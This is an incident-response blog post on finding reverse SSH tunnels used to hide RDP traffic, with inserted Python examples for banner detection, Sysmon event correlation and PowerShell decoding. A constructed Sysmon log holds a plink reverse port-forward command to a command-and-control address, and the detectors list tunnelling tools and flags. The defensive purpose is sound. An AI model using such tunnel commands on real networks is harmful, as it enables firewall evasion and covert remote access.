Incident Response Case: From SSH Tunnel To Endpoint Analysis

Alparslan Akyıldız academy
6 min read · Sep 24, 2019

In this post we will discuss detecting SSH tunnels on a network and investigate an incident. First of all, SSH is an encrypted protocol which provides secure shell connections between a client and a server. In the SSH server/client model, the client sends a connection request to the server, and the server sends its public host key to the client. The client proves its identity by using its SSH password or a digital signature. The client keeps the server's public key for later connections. RSA is used for signing and encryption, and DSA is used for signing only. If the client and server can negotiate with each other under the appropriate conditions, the SSH connection is established and stays open until it is closed. Before we start, I present you my Udemy trainings; if you want, you can benefit from my training to learn more deeply.

Let's examine the packet capture given below to comprehend the steps of the connection.

An SSH connection is established from the Ubuntu client to Kali's SSH server.

If you look at the connection steps, even though the TCP stream is encrypted, you can see the SSH version in the sniffed packets. We can use strings like SSH or OpenSSH for detecting SSH connections in a pcap file. Attackers and adversaries use SSH tunnels for hiding their network activity, tunnelling other protocols inside the SSH connection, and data exfiltration. An SSH tunnel implementation is shown below. First the attacker gains a reverse shell from the victim. The attacker uploads PuTTY's command line version, called plink, to the victim. Then the client opens an SSH connection to the C2C (in this example the command and control server is Kali) and says to the C2C "hey, I am a new victim, I am connecting to you via SSH, open the specified port on your own host and redirect the traffic sent to that port to my predetermined port". Don't be confused by it. Let's practice:

On the victim side (Windows 8):

The screenshot given above shows the SSH port redirection method via plink. Let's analyse the command: connect to 172.16.8.36 on TCP port 443 via SSH and tell it to open TCP port 3390; every packet sent to Kali's TCP port 3390 will be forwarded to my port 3389 inside my encrypted SSH connection. If the SSH session can be established this way, when the attacker connects via RDP to his local TCP port 3390, his connection is redirected to the victim's TCP port 3389. Let's try it:

As you see, the RDP connection is hidden inside the SSH connection. The attacker bypasses the firewall and NAT rules this way; moreover, the security admin can't detect RDP or other connections that are tunnelled inside SSH. In the first example the attacker used TCP port 443 for the reverse SSH connection, because firewalls are generally configured to permit TCP 443, 80 and UDP 53 from the internal network to the external network. Attackers take advantage of this and initiate reverse shells using these ports. For detecting SSH tunnels, we watch for SSH connections initiated from the internal network to the external network over TCP 443, 80, UDP 53 or TCP 53. Could a client connect to its own SSH server located on an external network and perform legitimate activities? The answer is yes, but this traffic is still an anomaly, because you should have a connection policy, and your network security admin should segment and separate the network, classify it, and then implement whitelisting and access control rules. Once you detect an anomaly on the network, you should go to the endpoint that originated the traffic, examine the Sysmon logs (you can aggregate the logs and forward them to Splunk, ELK, or another SIEM), and dump the memory image for analysis. After matching the socket of the traffic to the process that caused it, we can analyse it better. Let's analyse the pcap for detecting the SSH tunnel. Always analyse cases like an attacker; if you don't have the attacker's perspective, you can't solve the attack map.
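The two network indicators described above (an SSH identification banner on a port where SSH is not expected, and a session that stays open for days) can be checked mechanically over reassembled TCP streams. The following is an added example, not code from the post; the session records, the 12-hour threshold and the IP addresses are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# RFC 4253 identification string: "SSH-protoversion-softwareversion [SP comments] CR LF".
# It is sent in clear before key exchange, which is why "OpenSSH" is greppable in a pcap.
SSH_BANNER = re.compile(rb"^SSH-(\d\.\d+)-([^\r\n ]+)")
# Ports the post names as usually allowed outbound and therefore used for tunnels.
WATCHED_PORTS = {443, 80, 53}
LONG_SESSION = timedelta(hours=12)  # tuning threshold, assumed here

def ssh_software(first_payload: bytes):
    """Return the software string if a TCP stream opens with an SSH banner, else None."""
    m = SSH_BANNER.match(first_payload)
    return m.group(2).decode("ascii", "replace") if m else None

def analyze_sessions(sessions):
    """Flag SSH sessions that use a watched port instead of 22, and any SSH
    session that stays open longer than LONG_SESSION."""
    findings = []
    for s in sessions:
        software = ssh_software(s["first_payload"])
        if software is None:
            continue  # not SSH, whatever the port says
        reasons = []
        if s["dport"] in WATCHED_PORTS:
            reasons.append("ssh-on-port-%d" % s["dport"])
        if s["end"] - s["start"] >= LONG_SESSION:
            reasons.append("long-session")
        if reasons:
            findings.append({"src": s["src"], "dst": "%s:%d" % (s["dst"], s["dport"]),
                             "software": software, "reasons": reasons})
    return findings

# Constructed sample sessions (first server payload of each TCP stream), modelled on the post.
SAMPLE_SESSIONS = [
    {"src": "172.16.8.3", "dst": "172.16.8.36", "dport": 443,
     "first_payload": b"SSH-2.0-OpenSSH_7.9p1 Debian-10\r\n",
     "start": datetime(2019, 9, 21, 10, 0), "end": datetime(2019, 9, 24, 10, 5)},
    {"src": "172.16.8.5", "dst": "203.0.113.10", "dport": 443,
     "first_payload": b"\x16\x03\x03\x00\x5a\x02\x00\x00V\x03\x03",  # TLS ServerHello
     "start": datetime(2019, 9, 24, 9, 0), "end": datetime(2019, 9, 24, 9, 1)},
    {"src": "172.16.8.9", "dst": "172.16.8.20", "dport": 22,
     "first_payload": b"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\r\n",
     "start": datetime(2019, 9, 24, 8, 0), "end": datetime(2019, 9, 24, 8, 10)},
]

if __name__ == "__main__":
    for finding in analyze_sessions(SAMPLE_SESSIONS):
        print(finding)
```

Only the first session is reported, with both reasons; the TLS stream on 443 and the short session on port 22 are left alone.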

Scenario-based incident response steps:

I will search for the OpenSSH keyword in this pcap:

You noticed an anomaly while monitoring traffic in the SIEM and decided to get a pcap. When you analysed the pcap file, you paid attention to an SSH connection that passed through TCP 443. Is this situation acceptable under your security procedure? Is it appropriate for your access control?

You examine the session start time and end time and you see this session has been open for 3 days. It's suspicious traffic. Then you go to the origin of the traffic. The endpoint IP address is 172.16.8.3, and you start to investigate the Sysmon logs: you realise that plink.exe was uploaded to the client 2 minutes before the reverse SSH connection was initiated.

From the Sysmon logs, examine the sockets and processes to detect the process that caused the SSH connection.

As you see above, port forwarding is used for accessing TCP 3389 (RDP) from the external network. And if you review the logs, you can see the command line parameters of the SSH tunnel. Bingo!!!
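The endpoint side of the investigation is a join between Sysmon event types: the network connection (Event ID 3) gives the ProcessGuid, the process creation (Event ID 1) gives the image and command line with the port-forward option, and the file creation (Event ID 11) shows when the binary was written to disk. This is an added example, not the post's code; the events are constructed to mirror the timeline the post describes, and the tool names, paths and GUIDs are assumptions.

```python
import re
from datetime import datetime

# Binaries and options the post associates with SSH tunnelling from a Windows endpoint.
TUNNEL_TOOLS = {"plink.exe", "ssh.exe", "putty.exe"}
FORWARD_FLAG = re.compile(r"(?:^|\s)-[RLD]\s*\S+")  # remote/local/dynamic port forward
WATCHED_PORTS = {443, 80, 53}

def find_tunnel_processes(events):
    """Join Sysmon EID 3 (network connect) on a watched port to the EID 1 (process
    create) that owns the socket via ProcessGuid, check its command line for a
    port-forward option, and report how long before that the binary was written
    to disk (EID 11)."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    drops = {e["TargetFilename"].lower(): e["UtcTime"] for e in events if e["EventID"] == 11}
    findings = []
    for e in events:
        if e["EventID"] != 3 or e["DestinationPort"] not in WATCHED_PORTS:
            continue
        proc = procs.get(e["ProcessGuid"])
        if proc is None:
            continue
        image = proc["Image"].rsplit("\\", 1)[-1].lower()
        fwd = FORWARD_FLAG.search(proc["CommandLine"])
        if image in TUNNEL_TOOLS or fwd:
            dropped = drops.get(proc["Image"].lower())
            findings.append({
                "image": image,
                "dest": "%s:%d" % (e["DestinationIp"], e["DestinationPort"]),
                "forward": fwd.group(0).strip() if fwd else None,
                "dropped_seconds_before": (proc["UtcTime"] - dropped).total_seconds() if dropped else None,
            })
    return findings

# Constructed Sysmon events (field names as in the Sysmon schema), modelled on the post's timeline.
SYSMON_EVENTS = [
    {"EventID": 11, "UtcTime": datetime(2019, 9, 21, 9, 58), "ProcessGuid": "{G0}",
     "TargetFilename": r"C:\Users\Public\plink.exe"},
    {"EventID": 1, "UtcTime": datetime(2019, 9, 21, 10, 0), "ProcessGuid": "{G1}",
     "Image": r"C:\Users\Public\plink.exe",
     "CommandLine": r"plink.exe -P 443 -R 3390:127.0.0.1:3389 user@172.16.8.36"},
    {"EventID": 3, "UtcTime": datetime(2019, 9, 21, 10, 0, 2), "ProcessGuid": "{G1}",
     "DestinationIp": "172.16.8.36", "DestinationPort": 443},
    {"EventID": 1, "UtcTime": datetime(2019, 9, 21, 10, 3), "ProcessGuid": "{G2}",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "CommandLine": "firefox.exe"},
    {"EventID": 3, "UtcTime": datetime(2019, 9, 21, 10, 3, 1), "ProcessGuid": "{G2}",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]
```

The browser's normal HTTPS connection on 443 is not reported because its process has neither a tunnelling image name nor a forward option; the plink process is, together with the 120 seconds between file drop and execution.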

But we still don't know how the adversary compromised this machine. Keep on investigating. I reviewed the socket logs and found malicious PowerShell code run before the SSH connection was established:

The file type is shown as RTM, and my analysis goes back one step at a time. In the last step I detected a Word file that dropped this malicious PowerShell code:

After this detection I analysed the file to create IOCs. I used olevba to extract the macros, and I decoded the PowerShell code using a base64 decoder:
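The base64 step above has one detail that trips up a plain base64 decoder: PowerShell's -EncodedCommand carries the script as UTF-16LE, so decoding it as ASCII yields text interleaved with NUL bytes. The following added example (not from the post) extracts the blob from a command line and decodes it correctly; the sample command line is constructed here by encoding a harmless script the same way PowerShell expects.

```python
import base64
import re

# Common spellings of -EncodedCommand seen in command lines, followed by the base64 blob.
ENC_ARG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded script from a PowerShell command line, or None if there is no
    -EncodedCommand argument. The payload is UTF-16LE; fall back to a byte-preserving
    decode if a non-standard encoder produced something else."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")

# Constructed sample: a harmless script encoded exactly the way -EncodedCommand expects.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
```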

Finally, I created IOC rules for this malicious file:

In conclusion, for detecting SSH tunnels you should notice port/protocol mismatches: was the connection initiated from internal to external over 443, 53 or 80? Session times are very important; long-running connections should be investigated. The connection's destination IP addresses can be queried to learn whether they are malicious or not. Most of the time, network analysis should be supplemented with endpoint analysis.

See you!
